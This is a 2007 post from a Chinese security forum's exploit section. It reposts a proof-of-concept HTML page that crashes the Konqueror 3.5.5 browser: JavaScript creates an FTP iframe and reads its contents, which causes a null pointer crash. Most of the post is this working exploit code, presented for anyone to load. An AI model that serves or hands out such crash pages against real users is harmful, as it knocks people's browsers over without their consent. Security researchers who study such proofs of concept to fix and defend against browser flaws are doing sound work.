Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1109 小时
注册时间: 2007-10-23
最后登录: 2008-9-7

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-3-8 23:02 只看该作者

Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit

复制内容到剪贴板

代码:

<html>

<body>



Demo of how to make Konqueror 3.5.5 crash by [email]mark@bindshell.net[/email].<p>

Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.<p>

<p>



<script>

read_iframe = function(iframe_name) {

  var banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;

  alert(banner);

}



var iframe = document.createElement("IFRAME");

iframe.setAttribute("src", &#39;ftp://localhost/anything&#39;);

iframe.setAttribute("name", &#39;myiframe&#39;);

iframe.setAttribute("id", &#39;myiframe&#39;);

iframe.setAttribute("onload", &#39;read_iframe("myiframe")&#39;);

iframe.style.width = "100px";

iframe.style.height = "100px";

  

document.body.appendChild(iframe);



</script>

</body>

</html>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit